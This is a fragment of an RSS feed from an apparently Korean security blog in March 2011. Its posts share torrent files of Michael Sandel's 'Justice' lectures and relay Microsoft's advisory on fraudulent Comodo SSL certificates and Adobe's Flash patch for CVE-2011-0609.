			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0xFF small talk</category>
			<category>Samsung</category>
			<category>StarLogger</category>
			<category>삼성</category>
			<category>어쩔..</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/138</guid>
			<comments>http://malwarelab.tistory.com/entry/Samsung-installs-keylogger-on-its-laptop-computers#entry138comment</comments>
			<pubDate>Thu, 31 Mar 2011 13:35:39 +0900</pubDate>
		</item>
		<item>
			<title>Michael Sandel - Justice</title>
			<link>http://malwarelab.tistory.com/entry/Michael-Sandel-Justice</link>
			<description>&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&amp;nbsp;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile29.uf.tistory.com/original/185A86444D8C24A326999F&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile29.uf.tistory.com/image/185A86444D8C24A326999F&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;justice.jpg&quot; height=&quot;702&quot; width=&quot;458&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
EBS 좋아하십니까?&lt;br /&gt;
&lt;br /&gt;전 좋아합니다. :)&lt;br /&gt;
&lt;br /&gt;게다가 와이프도 좋아합니다. &lt;br /&gt;
&lt;br /&gt;전 &quot;지식채널e&quot; 와 &quot;세계테마기행&quot; 을 좋아하구요&lt;br /&gt;
&lt;br /&gt;와이프는 아이들 관련된 프로를 좋아합니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
다름이 아니라&amp;nbsp;얼마전 방영되었던 하버드대 마이클 샌덜 교수의 정의(Justice) 강연이 상당한 인기를 얻었었는데요.&lt;br /&gt;
&lt;br /&gt;연초에 TV에서 한두편 정도만 봤었는데 이 기회에 전부 다 봐야겠습니다. ㅎㅎ&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;(저작권 어쩌고 저쩌고 걸리는거 아니겠죠? ㅜ.ㅜ)&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
속도가 생각보다 빠르니 금방 받으실 수 있을겁니다.&lt;br /&gt;
&lt;br /&gt;저도 컴퓨터 켜져 있는 동안에는 계속 켜두도록 하겠습니다. XD&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&amp;lt;강연 목록&amp;gt;&lt;br /&gt;
1강. 벤담의 공리주의&lt;br /&gt;
2강. 공리주의의 문제점&lt;br /&gt;
3강. 자유지상주의와 세금&lt;br /&gt;
4강. 존 로크와 자유지상주의&lt;br /&gt;
5강. 합의의 조건&lt;br /&gt;
6강. 임마누엘 칸트의 도덕론&lt;br /&gt;
7강. 거짓말의 교훈&lt;br /&gt;
8강. 공정한 출발&lt;br /&gt;
9강. 소수집단우대정책&lt;br /&gt;
10강. 아리스토텔레스의 시민정치&lt;br /&gt;
11강. 충성의 딜레마&lt;br /&gt;
12강. 정의와 좋은 삶&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;

&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile27.uf@196A79414D8C23E333A6FC.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 1강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile30.uf@1569FA414D8C23E334054F.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 2강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile25.uf@127246414D8C23E32AD6D7.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 3강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile9.uf@187832414D8C23E4210368.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 4강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile8.uf@196EAF414D8C23E435B437.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 5강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile23.uf@127181414D8C23E42B861A.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 6강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile29.uf@136D4F414D8C23E5328FF6.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 7강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile2.uf@1272D7414D8C23E52819A3.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 8강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile1.uf@187629414D8C23E5260F14.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 9강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile27.uf@1969A7414D8C23E234D3E6.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 10강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile3.uf@2001EB414D8C23E21606DD.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 11강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://malwarelab.tistory.com/attachment/cfile7.uf@126DC9414D8C23E3310E44.torrent&quot;&gt;&lt;img src=&quot;http://i1.daumcdn.net/cfs.tistory/v/110706133414/blog/image/extension/unknown.gif&quot; alt=&quot;&quot; style=&quot;vertical-align: middle;&quot; /&gt; Michael Snadel - Justice 12강.torrent&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-137-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-137-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-137-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/137&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0xFF small talk</category>
			<category>justic</category>
			<category>Michael Sandel</category>
			<category>마이클 샌델</category>
			<category>정의</category>
			<category>정의로운 사회를 위하여</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/137</guid>
			<comments>http://malwarelab.tistory.com/entry/Michael-Sandel-Justice#entry137comment</comments>
			<pubDate>Fri, 25 Mar 2011 14:14:19 +0900</pubDate>
		</item>
		<item>
			<title>Microsoft Update : Fraudulent Digital Certificates Could Allow Spoofing</title>
			<link>http://malwarelab.tistory.com/entry/Microsoft-Update-Fraudulent-Digital-Certificates-Could-Allow-Spoofing</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;최근 코모도에서 해킹사건이 있었고 이를 통해 가짜 인증서가 발급되었었습니다.&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;Rogue SSL certificates (&quot;case comodogate&quot;)&lt;/STRONG&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.f-secure.com/weblog/archives/00002128.html&quot;&gt;http://www.f-secure.com/weblog/archives/00002128.html&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
가짜로 발급된 인증서는 아래 사이트들에 접속할 때 영향을 받습니다.&lt;br /&gt;
&lt;br /&gt;mail.google.com (GMail)&lt;br /&gt;
login.live.com (Hotmail et al)&lt;br /&gt;
&lt;A href=&quot;http://www.google.com/&quot;&gt;www.google.com&lt;/A&gt;&lt;br /&gt;
login.yahoo.com (three certificates)&lt;br /&gt;
login.skype.com&lt;br /&gt;
addons.mozilla.org (Firefox extensions)&lt;br /&gt;
&quot;Global Trustee&quot;&lt;br /&gt;
&lt;br /&gt;Phishing이나 MITM(Man in the Middle) 공격에 악용될 수 있다고 하는데요.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
아래 그림은 가짜로 발급된 인증서와 정상 인증서 모습입니다. (가짜는 &lt;A title=&quot;[http://hummingbird.tistory.com/2863]로 이동합니다.&quot; href=&quot;http://hummingbird.tistory.com/2863&quot; target=_blank&gt;벌새님 블로그&lt;/A&gt;에서~)&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;/P&gt;
&lt;P style=&quot;MARGIN: 0px&quot;&gt;&lt;div class=&quot;imageblock center&quot; style=&quot;text-align: center; clear: both;&quot;&gt;&lt;a href=&quot;http://cfile6.uf.tistory.com/original/134DA24F4D8BF0D92F5006&quot; rel=&quot;lightbox&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://cfile6.uf.tistory.com/image/134DA24F4D8BF0D92F5006&quot; alt=&quot;&quot; filemime=&quot;image/jpeg&quot; filename=&quot;rogue_ssl.png&quot; height=&quot;356&quot; width=&quot;710&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;/P&gt;
&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;가짜 인증서는 발급자가 UTN-USERFirst-Hardware로 되어 있다고 하니 위 사이트에 접속하셔서 확인하신 후 &lt;br /&gt;
&lt;br /&gt;Microsoft에서 제공하는 긴급 업데이트를 적용하시면 되겠습니다.&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;STRONG&gt;Microsoft Security Advisory (2524375) - Fraudulent Digital Certificates Could Allow Spoofing&lt;br /&gt;
&lt;/STRONG&gt;&lt;A href=&quot;http://www.microsoft.com/technet/security/advisory/2524375.mspx&quot;&gt;http://www.microsoft.com/technet/security/advisory/2524375.mspx&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/P&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-136-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-136-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-136-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/136&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x06 vulnerability</category>
			<category>certificate</category>
			<category>comodo</category>
			<category>KB2524375</category>
			<category>Rogue</category>
			<category>ssl</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/136</guid>
			<comments>http://malwarelab.tistory.com/entry/Microsoft-Update-Fraudulent-Digital-Certificates-Could-Allow-Spoofing#entry136comment</comments>
			<pubDate>Fri, 25 Mar 2011 10:21:42 +0900</pubDate>
		</item>
		<item>
			<title>Security updates available for Adobe [CVE-2011-0609]</title>
			<link>http://malwarelab.tistory.com/entry/Security-updates-available-for-Adobe-CVE-2011-0609</link>
			<description>&lt;P&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;New Adobe Zero-Day [CVE-2011-0609]&lt;/STRONG&gt;&lt;br /&gt;
&lt;A href=&quot;http://malwarelab.tistory.com/133&quot; target=_blank&gt;&lt;SPAN style=&quot;FONT-FAMILY: Verdana&quot;&gt;2011/03/15 - [0x06 vul info] - New Adobe Zero-Day [CVE-2011-0609]&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;&lt;STRONG&gt;&lt;FONT color=#e31600&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Verdana&quot;&gt;Security update available for Adobe Flash Player&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;br /&gt;
&lt;/FONT&gt;&lt;/STRONG&gt;&lt;br /&gt;
&lt;A href=&quot;http://www.adobe.com/support/security/bulletins/apsb11-05.html&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;&lt;SPAN style=&quot;FONT-FAMILY: Helvetica&quot;&gt;http://www.adobe.com/support/security/bulletins/apsb11-05.html&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;br /&gt;
&lt;br /&gt;&lt;br /&gt;
